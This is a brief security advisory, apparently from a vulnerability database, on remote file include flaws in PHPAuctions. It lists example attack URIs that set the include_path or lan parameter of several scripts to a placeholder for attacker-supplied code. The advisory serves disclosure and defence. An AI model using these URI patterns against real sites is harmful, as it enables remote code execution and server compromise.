|
PHPAuctions Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following example URIs are available: http://www.example.com/[path]/includes/settings.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/converter.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/messages.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/stats.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/useragent.inc.php?include_path=[darkcode] http://www.example.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] http://www.example.com/[path]/browse.php?lan=[darkcode] http://www.example.com/[path]/search.php?lan=[darkcode] |
|
 Privacy Statement |
